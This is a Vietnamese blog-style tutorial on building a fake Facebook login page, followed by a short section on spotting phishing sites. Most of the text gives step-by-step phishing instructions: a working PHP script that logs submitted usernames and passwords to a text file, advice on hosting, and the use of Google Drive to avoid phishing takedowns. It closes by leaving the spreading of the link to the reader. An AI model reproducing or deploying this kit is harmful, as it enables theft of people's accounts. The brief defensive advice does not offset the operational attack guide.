Cách tạo một Website lấy Password FB - Nhận biết và phòng tránh website lừa đảo.

Phishing là gì?

Phishing là một kỹ thuật tạo một trang Đăng nhập giả giống trang thật, khi bạn hoặc ai khác đăng nhập vào trang đó, thông tin đăng nhập của bạn bị đánh cắp. Trong bài viết này mình sẽ cho bạn thấy làm thế nào để tạo ra các trang đăng nhập Facebook giả mạo đơn giản. Mục đích không phải hướng dẫn bạn thành kể xấu đi đánh cắp thông tin người khác, mà cho bạn thấy người ta tạo nó như thế nào, cách nhận diện và phòng tránh được trang web lừa đảo.

I – Tạo một trang web lừa đảo giống trang Facebook.

Để thực hiện điều này bạn cần tạo 3 file sau :

1) .html

2) .php

3) .txt

Tải 3 file đã làm: Tại đây.

Hướng dẫn: Tại đây.

Bước 1:

Mở 1 trang web mà bạn muốn tạo fake login page. Ở đây mình dùng facebook:

Click chuột fải và chọn xem nguồn trang ( view page source).

Một tab mới hiện ra, bạn hãy bôi đen toàn bộ nội dung trog đó bằng cách sử dụng ctrl + A và copy & paste nó vào notepad, bạn có thể đùng Notepad ++, Tải xuống Tại đây.

Xóa dòng đầu tiên là <!DOCTYPE html>  rồi save file notepad này lại thành "index.html". (Lưu tạm đó, bạn sẽ chỉnh sửa nó ở những bước tiếp theo.) 

Bước 2:

Bạn mở notepad ra ra copy toàn bộ code ở dưới vào và save với tên là “login.php"

Code:

<?php

header ('Location: https://www.facebook.com  ');

$handle = fopen("pass.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

Bước 3:

Tạo ra tiếp 1 file notepage nữa đặt tên là  "pass.txt" rồi để đó.

Đến đây, chúng ta đã có 3 file cần thiết.

Bước 4: Tiếp theo các bạn upload  2 file là login.phppass.txt vừa tạo ở bước 2 và bước 3 lên 1 webhosting nào đó.

Ở đây mình dùng host miễn phí là : http://www.byethost.com

Các bạn phải đang kí thì mới úp được. Cách đăng kí Host như thế nào các bạn có thể tham khảo thêm Tại đây.

Sau khi đăng kí xong bạn vào mục  Online file manager, vào thư mục htdocs chọn upload và upload cả 2 file  là login.php và pass.txt vừa tạo xong vào lên host.

-----> Riêng file pass.txt bạn CHMOD nó là 777.

 

Sau khi upload xong...File login.php của bạn sẽ có dạng

 "www.username-của-bạn.byethost??.com/login.php"

"www.username-của-bạn.byethost??.com/pass.txt"

(“www.username-của-bạn.byethost??.com” phần này nhà cung cấp host có gửi mail cho bạn khi bạn đăng kí host.)

Bước 5:Upload file index.html bạn vừa tạo ở bước 1 lên Google Drive.

( Thông thường bạn upload cả 3 file lên host là ok nhưng Hiện tại một số host có khả năng nhận diện Phishing và Block tài khoản nào úp Phishing nên Google Drive là lựa chọn tốt nhất để tạo hosting chứa Phishing mà không bị block link.)

Trước khi upload bạn cần Chỉnh sửa file index.html ở bước 1 như sau:

- Mở file index.html bằng Notepad, ấn Ctrl + F trong notepad và tìm từ "action", sau nó có dòng: https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110

bạn hãy xóa toàn bộ nội dung trong dấu "ngoặc kép" 

và thay vào đó là "www.username-của-bạn.byethost??.com/login.php"

("www.username-của-bạn.byethost??.com/login.php" là tên miền chứa file login.php của host mà bạn upload nó ở trên.)

 

Tiếp theo, bạn vào google drive tạo một thư mục, ở đây tôi tạo tên thư mục là host.

Upload file index.html lên thư mục host của google drive.

Chia sẻ file bạn vừa Upload như sau:

Lưu lại và copy đường dẫn file vào Notepage or Word,…

Chú ý các kí tự trong giới hạn như hình ( ở đây màu đỏ).

Ví dụ: https://drive.google.com/file/d/0B7vTnwoYzqRlNS12LVZCOVlXZnM/view?usp=sharing

 

Copy lại và Pase nó sau https://googledrive.com/host/ thành

https://googledrive.com/host/0B7vTnwoYzqRlNS12LVZCOVlXZnM

Bước 5: Chép địa chỉ trên vào address của trinh duyệt của Chrome, Cốc Cốc, Firefox,… Để vào trang Fake của Facebook. Như vậy trang bạn vừa tạo giao diện không khác trang facebook.

Khi bạn điền thong tin và ấn đăng nhập, thông tin sẽ được chép vào file pass.txt mà bạn up trên host. Kiểm tra lại thì bạn vào file pass.txt  truy cập nhanh bằng cách gõ:

www.username-của-bạn.byethost??.com/pass.txt vào trình duyệt Chome, Cốc Cốc, Firefox,...

Còn phát tán link web lừa đảo đến một ai đó là cách của bạn J.

 

 II – Cách nhận diện và phòng tránh trang lừa đảo Phishing.

Nhận diện trang lừa đảo đơn giản nhất là xem địa chỉ trang địa chỉ trên thanh Address của trình duyệt web.

Trang web lừa đảo thường có tên miền dài hoặc khác với tên miền trang thật. Một số có thể gần giống nhau chỉ khác nhau vài kí tự .

Đa số các trình duyệt web hiện nay điều có bảo mật nhận điện trang lừa đảo.

Khi bạn vào trang lừa đảo sẽ có thông báo như sau:

Nếu trình duyệt của bạn chưa bật bảo mật thì bật bảo mật.

Ví dụ trong Chrome vào Cài đặt:   “chrome://settings” , chọn Hiển thị cài đặt nâng cao. Chọn “ Bảo vệ bạn và thiết bị khỏi trang web nguy hiểm”.

 

Chúc bạn lướt web an toàn J J J !